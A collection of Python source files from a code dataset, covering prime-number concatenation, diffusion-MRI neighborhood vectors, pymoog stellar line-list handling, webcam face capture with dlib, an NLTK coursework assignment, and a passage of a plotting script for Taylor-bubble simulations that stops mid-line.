{"seq_id":"610422405","text":"try:\r\n l=list(map(int,input().split()))\r\n n1=l[0]\r\n n2=l[1]\r\n l2=[]\r\n s=set()\r\n l4=[]\r\n prime=[True for i in range(n2+1)]\r\n for p in range(2,n2+1):\r\n if prime[p-1]==True:\r\n for j in range(p*p,n2+1,p):\r\n prime[j-1]=False\r\n for i in range(n1,n2+1):\r\n if prime[i-1]:\r\n l2.append(i)\r\n \r\n for i in range(len(l2)):\r\n for j in range(len(l2)):\r\n if l2[i]==l2[j]:\r\n continue\r\n else:\r\n l22=int(str(l2[i]) + str(l2[j]))\r\n s.add(l22)\r\n \r\n l23=int(str(l2[j]) + str(l2[i]))\r\n s.add(l23)\r\n l3=list(s)\r\n print(l3)\r\n prime=[True for i in range(max(l3)+1)]\r\n for p in range(2,max(l3)+1):\r\n if prime[p-1]==True:\r\n for j in range(p*p,max(l3)+1,p):\r\n prime[j-1]=False\r\n for i in l3:\r\n if prime[i-1]:\r\n l4.append(i)\r\n \r\n \r\nexcept:\r\n pass\r\n","sub_path":"python_programs/abbb2.py","file_name":"abbb2.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"439805658","text":"# -*- coding: utf-8 -*-\nimport itertools\nimport logging\nfrom typing import Iterable, Union\n\nimport numpy as np\nimport torch\n\n\ndef prepare_neighborhood_vectors(neighborhood_type: str, neighborhood_radius):\n \"\"\"\n Prepare neighborhood vectors.\n\n Params\n ------\n neighborhood_type: str\n Either the 'axes' option or the 'grid' option. See each method for a\n description.\n neighborhood_radius: Union[int, float, Iterable[float], None]\n The radius. An int for the grid option. A float or list of floats for\n the axes option. With the grid option, radius must be given in voxel\n space.\n\n Returns\n -------\n neighborhood_vectors: tensor of shape (N, 3).\n Results are vectors pointing to a neighborhood point, starting from the\n origin (i.e. current position). 
The current point (0,0,0) is NOT\n included.\n Hint: You can now interpolate your DWI data in each direction around\n your point of interest to get your neighbourhood.\n Returns None if neighborhood_radius is None.\n \"\"\"\n if neighborhood_type is not None:\n if neighborhood_radius is None:\n raise ValueError(\"You must provide neighborhood radius to add \"\n \"a neighborhood.\")\n\n if neighborhood_type not in ['axes', 'grid']:\n raise ValueError(\n \"Neighborhood type must be either 'axes', 'grid' \"\n \"but we received {}!\".format(neighborhood_type))\n\n if neighborhood_type == 'axes':\n neighborhood_vectors = get_neighborhood_vectors_axes(\n neighborhood_radius)\n else:\n if isinstance(neighborhood_radius, list):\n assert len(neighborhood_radius) == 1\n neighborhood_radius = neighborhood_radius[0]\n neighborhood_vectors = get_neighborhood_vectors_grid(\n neighborhood_radius)\n\n return neighborhood_vectors\n else:\n if neighborhood_radius is not None:\n logging.debug(\n \"You have chosen not to add a neighborhood (value \"\n \"None), but you have given a neighborhood radius. \"\n \"Discarded.\")\n return None\n\n\ndef get_neighborhood_vectors_axes(radius: Union[float, Iterable[float]]):\n \"\"\"\n This neighborhood definition lies on a sphere. Returns a list of 6\n positions (up, down, left, right, behind, in front) at exactly `radius`\n (mm or voxels) from origin (i.e. current position). If radius is an iterable\n of floats, returns a multi-radius neighborhood (lying on concentric\n spheres).\n\n Hint: Neighborhood's space will depend on the radius you give. To convert\n from mm to voxel world, you may use\n dwi_ml.data.processing.space.world_to_vox.convert_world_to_vox(\n radius_mm, affine_mm_to_vox)\n\n Note: We only support isometric voxels! Adding anisometry would also require\n the voxel resolution.\n\n Parameters\n ----------\n radius : number (int or float) or iterable of numbers.\n Distance to each neighbor.\n\n Returns\n -------\n neighborhood_vectors : tensor of shape (N, 3)\n A list of vectors with last dimension = 3 (x,y,z coordinate for each\n neighbour with respect to the origin). The current point (0,0,0) is NOT\n included.\n \"\"\"\n tmp_axes = np.identity(3)\n unit_axes = np.concatenate((tmp_axes, -tmp_axes))\n\n if not isinstance(radius, Iterable):\n radius = [radius]\n\n neighborhood_vectors = []\n for r in radius:\n neighborhood_vectors.extend(unit_axes * r)\n neighborhood_vectors = torch.as_tensor(np.asarray(neighborhood_vectors),\n dtype=torch.float)\n\n return neighborhood_vectors\n\n\ndef get_neighborhood_vectors_grid(radius_vox_space: int):\n \"\"\"\n This neighborhood definition lies on a grid. Returns a list of vectors\n pointing to points surrounding the origin that mimic the original voxel\n grid, in voxel space. Ex: with radius 1, this is 26 points. With radius 2,\n it's 124 points.\n\n Note: We only support isometric voxels! Adding anisometry would also\n require remembering the voxel resolution.\n\n Parameters\n ----------\n radius_vox_space : int\n Size of the neighborhood in each direction, in voxel space. Final\n neighborhood will be of dimension (2*radius+1) x (2*radius+1) x\n (2*radius+1), minus the origin.\n\n Returns\n -------\n neighborhood_vectors : tensor shape (N, 3)\n A list of vectors with last dimension = 3 (x,y,z coordinate for each\n neighbour with respect to the origin). 
The current point (0,0,0) is NOT\n included.\n \"\"\"\n if isinstance(radius_vox_space, float) and radius_vox_space.is_integer():\n radius_vox_space = int(radius_vox_space)\n assert type(radius_vox_space) == int, \"For the 'grid' neighborhood, \" \\\n \"radius must be an int. Received \" \\\n \"{}\".format(radius_vox_space)\n\n neighborhood_vectors = []\n the_range = range(-radius_vox_space, radius_vox_space + 1)\n for x, y, z in itertools.product(the_range, the_range, the_range):\n if not (x == y == z == 0): # Not adding origin; not a neighbor\n neighborhood_vectors.append([x, y, z])\n neighborhood_vectors = torch.as_tensor(np.asarray(neighborhood_vectors),\n dtype=torch.float)\n\n return neighborhood_vectors\n\n\ndef extend_coordinates_with_neighborhood(\n coords: torch.Tensor, neighborhood_vectors: torch.tensor):\n \"\"\"\n From a list of coordinates and neighborhood vectors (e.g. [up, down, left,\n right]), get a new list of coordinates with all translations applied to all\n coordinates.\n\n Parameters\n ------\n coords: tensor of shape (M, 3)\n An array of M points; [x,y,z] coordinates.\n neighborhood_vectors: tensor of shape (N, 3)\n A list of translation vectors to apply to each point in coords.\n\n Returns\n -------\n flat_coords: tensor of shape (M x (N+1), 3)\n The new coordinates with all N neighbors (N+1 including the original\n coordinates), in the same space and origin as coords.\n tiled_vectors: tensor\n The coordinates of neighbors with respect to the current coordinate\n (translation vectors).\n \"\"\"\n device = neighborhood_vectors.device\n assert coords.device == device, \"Neighborhood device is {}, but current \" \\\n \"coordinates device is {}\" \\\n .format(device, coords.device)\n\n m_coords = coords.shape[0]\n n_neighbors = neighborhood_vectors.shape[0]\n\n # 1. We repeat each coordinate to have the neighborhood size (+ 1 for\n # original coordinate) before applying translations.\n # coords = [p1 p1... p2 p2 ... ...]' (Size = [n, 3])\n flat_coords = coords.repeat_interleave(n_neighbors + 1, dim=0)\n\n # 2. We translate each point based on the translations vector.\n # Ex, if neighborhood_translations = [here, up, down, left, right, ...]\n # coords = [p1+0 p1+up p1+down ..., p2+0 p2+up, p2+down, ...]'\n # toDo. This \"cat\" happens every iteration. We can include it in\n # neighborhood vectors.\n total_neighborhood = torch.cat((torch.zeros(1, 3, device=device),\n neighborhood_vectors))\n tiled_vectors = torch.tile(total_neighborhood, (m_coords, 1))\n flat_coords += tiled_vectors\n\n return flat_coords, tiled_vectors\n","sub_path":"dwi_ml/data/processing/space/neighborhood.py","file_name":"neighborhood.py","file_ext":"py","file_size_in_byte":7568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"151262230","text":"#!/usr/bin/python\nfrom re import sub\nimport numpy as np\nimport pandas as pd\nimport os\nimport platform\nfrom . import private\nfrom . import synth\nfrom . import weedout\nfrom . 
import rundir_num\n\nMOOG_path = '{}/.pymoog/moog_nosm/moog_nosm_NOV2019/'.format(os.environ['HOME'])\nMOOG_run_path = '{}/.pymoog/rundir/'.format(os.environ['HOME'])\nMOOG_file_path = '{}/.pymoog/files/'.format(os.environ['HOME'])\n\n## Convert the element column to element species\n\ndef save_linelist(linelist_all, sub_ll_name, wav_start=None, wav_end=None, header=None, negative=False):\n '''\n Save the linelist in MOOG format to the specified position.\n \n Parameters\n ----------\n linelist_all : pandas.Dataframe\n The Dataframe of linelist in MOOG format\n sub_ll_name : str\n The name of the line list to be saved into.\n wav_start : float\n Start wavelength of the line list.\n wav_end : float\n End wavelength of the line list.\n header : str, optional\n Header line written to the top of the output file; defaults to 'Linelist'.\n negative : bool\n Switch to permit negative wavelength. \n '''\n \n # Crop the line list according to wavelength, if needed.\n if not(negative):\n index = linelist_all['wavelength'] > 0\n else:\n index = np.abs(linelist_all['wavelength']) >= 0\n if wav_start is not None:\n index = index & (linelist_all['wavelength'] > wav_start)\n if wav_end is not None:\n index = index & (linelist_all['wavelength'] < wav_end) \n \n sub_linelist = linelist_all[index]\n sub_linelist.reset_index(drop=True, inplace=True)\n \n # Judge if the length of the line list is 0; if so raise an error.\n if len(sub_linelist) == 0:\n raise ValueError('The length of line list is 0. Consider enlarging the wavelength range or check the input line list.')\n \n # Decide which format to save the linelist according to C6 value.\n if np.any(abs(sub_linelist['C6'].values) > 1e-25):\n output_format = '%10.3f%10.5f%10.4f%10.3f%10.3f%10.3f%10.3f'\n elif np.any(abs(sub_linelist['C6'].values) < 1e-25):\n output_format = '%10.3f%10.5f%10.4f%10.3f%10.2E%10.3f%10.3f'\n \n # Remove the last column if no EW values.\n if len(sub_linelist.columns) == 6:\n output_format = output_format[:-6]\n np.savetxt(sub_ll_name, np.array(sub_linelist), fmt=output_format)\n if 'linux' in platform.system().lower():\n run_status = private.subprocess.run(['sed', '-i', 's/nan/ /g', sub_ll_name], capture_output=True)\n elif 'darwin' in platform.system().lower():\n run_status = private.subprocess.run(['sed', '-i', \"''\", 's/nan/ /g', sub_ll_name], capture_output=True)\n else:\n # Same as Linux\n run_status = private.subprocess.run(['sed', '-i', 's/nan/ /g', sub_ll_name], capture_output=True)\n if run_status.returncode != 0:\n raise ValueError('NaN may not be removed correctly in the line list. The stderr text is: {}'.format(run_status.stderr)) \n if header is None:\n header = 'Linelist'\n if 'linux' in platform.system().lower():\n run_status = private.subprocess.run(['sed', '-i', '1 i\\{}'.format(header), sub_ll_name], capture_output=True)\n elif 'darwin' in platform.system().lower():\n run_status = private.subprocess.run(['sed', '-i', \"''\", '1 i\\{}'.format(header), sub_ll_name], capture_output=True)\n else:\n # Same as linux\n run_status = private.subprocess.run(['sed', '-i', '1 i\\{}'.format(header), sub_ll_name], capture_output=True)\n\ndef read_linelist(linelist_name, loggf_cut=None, mode='default'):\n '''\n Read the post-processed linelist.\n \n Parameters\n ----------\n linelist_name : str\n The MOOG format line list\n loggf_cut : float, optional\n Cut on loggf (only save for the lines with loggf > loggf_cut)\n mode : str, default 'default'\n Reading mode for the line list. 
'default' will first try to read using 'npy' mode then 'ascii' mode if the corresponding .npy file does not exist. Note that the efficiency of 'npy' mode is much higher than 'ascii' mode.\n '''\n \n available_line_list = ['ges', 'ges_hfs_iso', 'ges_nohfs_noiso', 'vald_3000_24000', 'vald_winered', 'mb99_j', 'mb99_k', 'apogee', 'kurucz', 'kurucz_winered']\n\n if (linelist_name[-5:] != '.list' and linelist_name[-4:] != '.npy') and linelist_name in available_line_list:\n # Read built-in line list\n if linelist_name == 'ges':\n linelist_name = 'ges_hfs_iso'\n if mode == 'default':\n linelist_name_full = MOOG_file_path + '/pymoog_lf/linelist/{}/{}.npy'.format(linelist_name.split('_')[0], linelist_name)\n mode = 'npy'\n if not(os.path.exists(linelist_name_full)):\n linelist_name_full = MOOG_file_path + '/pymoog_lf/linelist/{}/{}.list'.format(linelist_name.split('_')[0], linelist_name)\n mode = 'ascii'\n if not(os.path.exists(linelist_name_full)):\n raise ValueError('Neither npy nor ascii format of internal line list exists.')\n elif mode == 'npy':\n linelist_name_full = MOOG_file_path + '/pymoog_lf/linelist/{}/{}.npy'.format(linelist_name.split('_')[0], linelist_name)\n elif mode == 'ascii':\n linelist_name_full = MOOG_file_path + '/pymoog_lf/linelist/{}/{}.list'.format(linelist_name.split('_')[0], linelist_name)\n else:\n raise ValueError('mode must be \"default\", \"npy\" or \"ascii\".')\n elif linelist_name[-5:] == '.list':\n linelist_name_full = linelist_name\n mode = 'ascii'\n elif linelist_name[-4:] == '.npy':\n linelist_name_full = linelist_name\n mode = 'npy'\n else:\n raise ValueError(\"Built in line list type not recognized. Please use one of the following:\\n 'ges', 'ges_hfs_iso', 'ges_nohfs_noiso', 'vald_3000_24000', 'vald_winered', 'mb99_j', 'mb99_k', 'kurucz', 'kurucz_winered' or 'apogee'.\")\n \n if mode == 'npy':\n linelist_array = np.load(linelist_name_full, allow_pickle=True)\n linelist = pd.DataFrame(linelist_array, columns=['wavelength', 'id', 'EP', 'loggf', 'C6', 'D0', 'EW'])\n elif mode == 'ascii':\n linelist = pd.read_fwf(linelist_name_full, colspecs=[(0,11), (11,21), (21,31), (31,41), (41,51), (51,61), (61,71)], names=['wavelength', 'id', 'EP', 'loggf', 'C6', 'D0', 'EW'], skiprows=1)\n \n # MOOG seems to crash if there is a line with EP larger than 50 eV, so they are removed.\n # Needs to be tested for other line lists\n linelist = linelist[(linelist['EP'] <= 50)]\n if loggf_cut is not None:\n linelist = linelist[(linelist['loggf'] >= loggf_cut)]\n linelist.reset_index(drop=True, inplace=True)\n return linelist\n\ndef find_lines(linelist_keep, linelist_all, max_del_wav=0.05):\n '''\n Find the indices in linelist_all of the lines in linelist_keep, matching on wavelength, id and EP.\n '''\n line_index_keep = []\n for i in linelist_keep.index:\n indice = (np.abs(linelist_all['wavelength'] - linelist_keep.loc[i, 'wavelength']) < max_del_wav)\n for col in ['id', 'EP']:\n # Note: some difference in loggf may appear in different versions of the line list, so it is better to keep the version the same; loggf is not used here as a criterion for distinguishing lines.\n indice = indice & (np.abs(linelist_all[col] - linelist_keep.loc[i, col]) < 0.001)\n if len(linelist_all[indice]) == 0:\n raise ValueError('No matching line found.')\n else:\n line_index_keep.append(linelist_all[indice].index.values[0])\n return line_index_keep\n\ndef find_single_dominant_line(line_wav_input, teff, logg, m_h, resolution, line_list='ges', weedout_switch=False, search_half_width=0.5, include_strong_linelist=False, r_blen_thres=0.1, abun_change=None):\n\n '''\n Find the dominant line from a line list.\n\n Parameters\n 
----------\n line_wav_input : float\n Central wavelength of the search.\n teff : float\n The effective temperature of the model\n logg : float\n logg value of the model\n m_h : float\n [M/H] value (overall metallicity) of the model\n resolution : float\n Resolution of the synthetic spectra; this will be passed to MOOG and convolved with the initial spectra.\n line_list : str or pd.DataFrame, default 'ges'\n The name of the linelist file.\n weedout_switch : bool or float, default False\n The switch for running the weedout driver before synth. If False then weedout is not run; if True then weedout is run with kappa_ratio=0.01, and if a float (> 0 and < 1) is given then weedout is run with kappa_ratio set to that number.\n search_half_width : float, default 0.5\n The +- width for searching the dominant line.\n include_strong_linelist : bool, default False\n Whether to include the full line list after weedout as a separate output.\n r_blen_thres : float, default 0.1\n The threshold of blending ratio. Only a line with blending ratio smaller than r_blen_thres can be selected as the dominant line.\n abun_change : dict of pairs {int:float, ...}\n Abundance change; has to be a dict of pairs of atomic number and [X/Fe] values.\n\n Returns\n ----------\n dominant_line : pandas.DataFrame \n The dataframe containing the dominant line.\n linelist_keep : pandas.DataFrame, optional\n The line list after weedout. Only appears when include_strong_linelist is True.\n '''\n\n # Establish the linelist\n linelist_all = read_linelist(line_list)\n linelist_all = linelist_all[np.abs(linelist_all['wavelength']-line_wav_input) < search_half_width]\n\n # Calculate the blending ratio\n s = synth.synth(teff, logg, m_h, line_wav_input-search_half_width-1, line_wav_input+search_half_width+1, resolution, line_list=line_list)\n s.prepare_file(abun_change=abun_change)\n # Whole spectra \n s.run_moog()\n s.read_spectra()\n wav_all, flux_all = s.wav, s.flux\n\n # weedout lines\n if weedout_switch != False:\n w = weedout.weedout(teff, logg, m_h, line_wav_input-search_half_width, line_wav_input+search_half_width, line_list=line_list, kappa_ratio=weedout_switch)\n w.prepare_file()\n w.run_moog()\n \n # Target line exclude\n if weedout_switch:\n w.read_linelist()\n linelist_keep = w.keep_list\n else:\n linelist_keep = linelist_all\n \n line_index_keep = find_lines(linelist_keep, linelist_all)\n\n r_blend_ratio_list = []\n for line_index in line_index_keep:\n s = synth.synth(teff, logg, m_h, line_wav_input-search_half_width-1, line_wav_input+search_half_width+1, \n resolution, line_list=line_list)\n s.prepare_file(abun_change=abun_change)\n linelist_exclude = linelist_all.drop(line_index).reset_index(drop=True)\n save_linelist(linelist_exclude, s.rundir_path + 'line.list')\n s.run_moog()\n s.read_spectra(remove=False)\n wav_exclude, flux_exclude = s.wav, s.flux\n\n # Target line only\n linelist_target = linelist_all.loc[line_index:line_index].reset_index(drop=True)\n line_wavlength = linelist_target.loc[0, 'wavelength']\n line_loggf = linelist_target.loc[0, 'loggf']\n line_EP = linelist_target.loc[0, 'EP']\n if abun_change is not None:\n s.prepare_file(abun_change=abun_change)\n else:\n s.prepare_file()\n save_linelist(linelist_target, s.rundir_path + 'line.list')\n s.run_moog()\n s.read_spectra()\n wav_target, flux_target = s.wav, s.flux\n\n # Calculate the EW and blending fraction\n EW = (np.sum(1-flux_all)*0.02 - np.sum(1-flux_exclude)*0.02) * 1000\n depth = 1 - np.min(flux_all[np.abs(wav_all-line_wavlength) <= 0.03])\n 
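# blending ratio at the line centre: depth of the spectrum with the target line removed, over the depth of the full spectrum\n 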
r_blend_ratio = (1-flux_exclude[np.argmin(np.abs(wav_exclude-line_wavlength))]) / (1-flux_all[np.argmin(np.abs(wav_all-line_wavlength))])\n\n r_blend_ratio_list.append(r_blend_ratio)\n\n linelist_keep['r_blend_depth'] = r_blend_ratio_list\n\n if len(line_index_keep) > 0:\n try:\n dominant_line_index = np.abs(linelist_keep.loc[linelist_keep['r_blend_depth'] < r_blen_thres, 'wavelength'] - line_wav_input).sort_values().index[0]\n dominant_line = linelist_keep.loc[dominant_line_index:dominant_line_index].reset_index(drop=True)\n except IndexError:\n # No dominant line is found\n dominant_line = pd.DataFrame(np.array([np.nan]*8)).T\n dominant_line.columns = ['wavelength', 'id', 'EP', 'loggf', 'C6', 'D0', 'EW', 'r_blend_depth']\n else:\n # No line is found\n dominant_line = pd.DataFrame(np.array([np.nan]*8)).T\n dominant_line.columns = ['wavelength', 'id', 'EP', 'loggf', 'C6', 'D0', 'EW', 'r_blend_depth']\n\n if include_strong_linelist:\n return dominant_line, linelist_keep\n else:\n return dominant_line","sub_path":"build/lib/pymoog/line_data.py","file_name":"line_data.py","file_ext":"py","file_size_in_byte":12803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"22920956","text":"import dlib\r\nimport cv2\r\nimport os\r\nimport time\r\n\r\n# capture faces from the camera; only one face may be in view, and only a single face is recognized\r\n\r\n# faces are stored in directories named faces1, faces2 ...\r\nfaces_save_path = \"../faces_img/faces\"\r\n\r\n# first get the name for the faces\r\nfaces_name = input(\"Your name:\")\r\n\r\n\r\ndef create_faces_save_dir(path):\r\n # create a new directory to store the face images\r\n i = 1\r\n while True:\r\n if os.path.exists(path + str(i)):\r\n i += 1\r\n else:\r\n break\r\n os.mkdir(path + \"\" + str(i))\r\n return str(i)\r\n\r\n\r\n# get the id of the directory just created\r\nfaces_dir_id = create_faces_save_dir(faces_save_path)\r\n# append the id to the directory path\r\nfaces_save_path += faces_dir_id\r\n\r\n# face detector\r\ndetector = dlib.get_frontal_face_detector()\r\n\r\ncam = cv2.VideoCapture(0)\r\ncolor_green = (0, 255, 0)\r\nline_width = 1\r\n# total number of captured faces\r\nfaces_count = 0\r\nstart_time = time.time()\r\n\r\nwhile True:\r\n _, img = cam.read()\r\n\r\n # esc to quit or faces_count reaches 50\r\n if cv2.waitKey(1) == 27 or faces_count >= 50:\r\n print(\"ESC or faces get completed.\")\r\n break\r\n\r\n # capture one frame every 0.1 s; about 5 s to collect 50 images\r\n end_time = time.time()\r\n dets = detector(img)\r\n if end_time - start_time > 0.1:\r\n # only capture frames that contain exactly one face\r\n if len(dets) == 1:\r\n faces_count += 1\r\n start_time = end_time # reset the timer so roughly one face is captured per 0.1 s\r\n # save the image\r\n cv2.imwrite(\"{}/faces({}){}.{}.jpg\".format(faces_save_path,\r\n faces_name, faces_dir_id,\r\n str(faces_count)), img)\r\n # cv2.imwrite(faces_save_path + \"/faces\"+faces_dir_id +\r\n # \".\"+str(faces_count)+\".jpg\", img)\r\n if dets:\r\n cv2.rectangle(img, (dets[0].left(), dets[0].top()),\r\n (dets[0].right(), dets[0].bottom()),\r\n color_green, line_width)\r\n\r\n cv2.namedWindow('get faces', 2)\r\n cv2.imshow('get faces', img)\r\ncam.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"work/faces_get.py","file_name":"faces_get.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"57160098","text":"import nltk\r\n\r\nnltk.download('punkt')\r\nnltk.download('reuters')\r\nnltk.download('gutenberg')\r\nnltk.download('averaged_perceptron_tagger')\r\nnltk.download('universal_tagset')\r\n\r\n# Task 1 (1 mark)\r\nfrom collections import Counter\r\n\r\n\r\ndef stem_counter(text):\r\n \"\"\"Return a Python Counter of stems\r\n >>> c1 = stem_counter(\"Here is sentence 1. 
Here is sentence 2.\")\r\n >>> sorted(c1.most_common())\r\n [('.', 2), ('1', 1), ('2', 1), ('here', 2), ('is', 2), ('sentenc', 2)]\r\n >>> emma = nltk.corpus.gutenberg.raw('austen-emma.txt')\r\n >>> c2 = stem_counter(emma[:1000])\r\n >>> sorted(c2.most_common(4))\r\n [(',', 13), ('had', 7), ('of', 12), ('the', 7)]\r\n >>> c2['had']\r\n 7\r\n \"\"\"\r\n\r\n #create NLTK porter stemmer\r\n ps = nltk.PorterStemmer()\r\n\r\n #list which holds word stems\r\n word_stems = []\r\n\r\n for sentence in nltk.sent_tokenize(text):\r\n for word in nltk.word_tokenize(sentence):\r\n #add the stemmed word (in lower case) to the word stems list\r\n word_stems.append(ps.stem(word.lower()))\r\n\r\n counter = Counter(word_stems)\r\n return counter\r\n\r\n\r\n# Task 2 (1 mark)\r\ndef distinct_words_of_pos(text, pos):\r\n \"\"\"Return the sorted list of distinct words with a given part of speech\r\n >>> emma = nltk.corpus.gutenberg.raw('austen-emma.txt')\r\n >>> d = distinct_words_of_pos(emma[:1000], 'NOUN')\r\n >>> len(d)\r\n 42\r\n >>> d[:10]\r\n ['[', ']', 'affection', 'austen', 'between', 'blessings', 'caresses', 'clever', 'consequence', 'daughters']\r\n \"\"\"\r\n\r\n INDEX_WORD = 0\r\n INDEX_POS = 1\r\n\r\n #sorted list\r\n sorted_list = []\r\n\r\n #text to sentences\r\n text_sentences = [nltk.word_tokenize(s) for s in nltk.sent_tokenize(text)]\r\n\r\n #give words pos tags (within sentences)\r\n text_sentences_tags = nltk.pos_tag_sents((text_sentences), tagset='universal')\r\n\r\n for tst_list in text_sentences_tags:\r\n for element in tst_list:\r\n #if tag matches pos\r\n if element[INDEX_POS] == pos:\r\n #ensure no duplicates\r\n if element[INDEX_WORD] not in sorted_list:\r\n #add the word only\r\n sorted_list.append(element[INDEX_WORD])\r\n\r\n #convert words to lower case\r\n sorted_list = [x.lower() for x in sorted_list]\r\n\r\n #sort the list alphabetically\r\n sorted_list.sort()\r\n\r\n return sorted_list\r\n\r\n\r\n# Task 3 (1 mark)\r\ndef most_common_pos_bigram(text):\r\n \"\"\"Return the most common PoS bigram\r\n >>> most_common_pos_bigram(\"I saw the man with a telescope\")\r\n ('DET', 'NOUN')\r\n >>> emma = nltk.corpus.gutenberg.raw('austen-emma.txt')\r\n >>> most_common_pos_bigram(emma[:1000])\r\n ('NOUN', '.')\r\n \"\"\"\r\n\r\n import collections\r\n\r\n INDEX_POS = 1\r\n FIRST_ELEMENT = 0\r\n\r\n\r\n bigram_list = []\r\n\r\n # text to sentences\r\n text_sentences = [nltk.word_tokenize(s) for s in nltk.sent_tokenize(text)]\r\n\r\n # give words pos tags (within sentences)\r\n text_sentences_tags = nltk.pos_tag_sents((text_sentences), tagset='universal')\r\n\r\n for tst_list in text_sentences_tags:\r\n for element in tst_list:\r\n bigram_list.append(element[INDEX_POS])\r\n\r\n\r\n bigrams = list(nltk.bigrams(bigram_list))\r\n bigrams_count = collections.Counter(bigrams)\r\n\r\n return (bigrams_count.most_common(1)[FIRST_ELEMENT][FIRST_ELEMENT])\r\n\r\n\r\n# Task 4 (2 marks)\r\nimport re\r\n\r\n\r\ndef my_tokeniser(text):\r\n \"\"\"Return the tokens\r\n >>> my_tokeniser(\"This is a sentence\")\r\n ['This', 'is', 'a', 'sentence']\r\n \"\"\"\r\n\r\n regexp = r'''([\\w]+([-/.,']*[\\w])*)'''\r\n\r\n items = []\r\n\r\n for all in re.findall(regexp, text):\r\n items.append(all[0])\r\n\r\n return items\r\n\r\n# - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # -\r\n# DO NOT MODIFY THE CODE BELOW\r\ndef baseline_tokeniser(text):\r\n \"A baseline tokeniser\"\r\n regexp = r'''[^\\s]+'''\r\n return re.findall(regexp, text)\r\n\r\n\r\ndef false_negatives(tokens, target):\r\n 
\"\"\"Return false negatives\r\n False negatives are items from the target that were not detected\r\n as tokens\"\"\"\r\n return list(set(target) - set(tokens))\r\n\r\n\r\ndef false_positives(tokens, target):\r\n \"\"\"Return the false positives\r\n False positives are the items that were wrongly identified as tokens\"\"\"\r\n return list(set(tokens) - set(target))\r\n\r\n\r\ndef my_score(raw, tokens, target):\r\n fn = false_negatives(tokens, target)\r\n fp = false_positives(tokens, target)\r\n score = len(fn) / len(target) + len(fp) / len(target)\r\n baseline_results = baseline_tokeniser(raw)\r\n fn_baseline = false_negatives(baseline_results, target)\r\n fp_baseline = false_positives(baseline_results, target)\r\n score_baseline = len(fn_baseline) / len(target) + len(fp_baseline) / len(target)\r\n return max(0, 2 * (score_baseline - score) / score_baseline)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import doctest\r\n\r\n doctest.testmod()\r\n raw_reuters = nltk.corpus.reuters.raw(categories=\"corn\")\r\n words_reuters = [w for s in nltk.sent_tokenize(raw_reuters)\r\n for w in nltk.word_tokenize(s)]\r\n\r\n score = my_score(raw_reuters, my_tokeniser(raw_reuters), words_reuters)\r\n if score <= 0:\r\n rounded_score = 0\r\n elif score > 0 and score <= 0.5:\r\n rounded_score = 0.5\r\n elif score > 0.5 and score <= 1:\r\n rounded_score = 1\r\n elif score > 1 and score <= 1.5:\r\n rounded_score = 1.5\r\n else:\r\n rounded_score = 2\r\n\r\n print(\"Score of your tokeniser: %1.3f Rounded: %1.1f\" % (score,\r\n rounded_score))\r\n","sub_path":"comp348/assignment_1/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"649026447","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# this file use to draw the images to explain\n# how to get the volume of the bubbles\n\nfrom __future__ import unicode_literals\nimport os\nimport sys\nimport numpy as np\nimport math\nimport matplotlib \nimport matplotlib.pyplot as plt\nimport pylab\nimport argparse\nimport string\nimport math\nimport re\nimport operator\nfrom scipy import ndimage\n\n\nfrom PIL import Image\nfrom PIL import ImageEnhance\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib.patches import Arc\n\n#from DataP import DataProcess\n#import TaylorCorrelation as TC\n#import lookup as LOOKUP\n\nmatplotlib.rcParams['text.usetex'] = True\nmatplotlib.rcParams['text.latex.unicode'] = True\nmatplotlib.rcParams['font.family'] = 'serif'\nmatplotlib.rcParams['font.size'] = 10\nmatplotlib.rcParams['xtick.direction'] = 'in'\nmatplotlib.rcParams['ytick.direction'] = 'in'\nmatplotlib.rcParams['figure.dpi'] = 50\nmatplotlib.rcParams['figure.dpi'] = 50\n\nCWP = os.path.abspath(\"./\")\ndir_list = [60,70,80,90,95]\ncase = [1,2,3,4,5,6,7]\na = 2\ni = 0\nwhile i < 7: \n try:\n PATH_REFERENCE = os.path.abspath('/media/lguo/Elements/calculation/Taylor_bubble/2D/singularity/concave-parabolic/expansion/{}/{}/taylor_2D'.format(str(dir_list[a]),str(case[i])))\n PATH_REFERENCE_1 = os.path.abspath('/media/lguo/Elements/calculation/test-cases/no-phase-change/taylor-bubble/2D/sudden_expansion_same/60/4/taylor_2D/velocity')\n PATH_INTERFACE = PATH_REFERENCE + '/interface'\n PATH_VELOCITY = PATH_REFERENCE + '/velocity'\n PATH_OUT = PATH_REFERENCE\n #PATH_COM = os.path.abspath(\"/media/lguo/Elements1/writing/Article/elsarticle-taylor/figure/2D/velocity_vector/straight\")\n PATH_COM = os.path.abspath(\"/media/lguo/Elements/writing/thesis-part/chapter-5/parabolic-concave/expansion/figure\")\n PATH_FIG = PATH_COM + '/{}/{}-{}'.format(str(dir_list[a]),str(dir_list[a]),str(case[i]))\n PATH_FIG_SAVE = os.path.abspath('/media/lguo/Elements/phd-manuscript/thesis-manuscript/Taylor-bubble/latex/elsarticle-taylor/figure/mesh/mesh')\n if not os.path.exists(PATH_COM):\n os.makedirs(PATH_COM)\n if not os.path.exists(PATH_FIG):\n os.makedirs(PATH_FIG)\n\n def get_sur(filename):\n fn = os.path.join(PATH_REFERENCE_1 , filename)\n sur = []\n with open(fn, 'r') as file:\n seg = []\n for line in file.readlines():\n line = line.rstrip('\\n')\n l = line.split(' ')\n if len(l) == 2:\n #print float(l[0]), float(l[1])\n seg.append([float(l[0]), float(l[1])])\n else:\n segn = seg[:]\n sur.append(segn)\n seg = []\n return sur\n\n def get_out(filename):\n fn = os.path.join(PATH_OUT, filename)\n sur = []\n with open(fn, 'r') as file:\n seg = []\n for line in file.readlines():\n line = line.rstrip('\\n')\n l = line.split(' ')\n if len(l) == 3:\n #print float(l[0]), float(l[1])\n seg.append([float(l[0]), 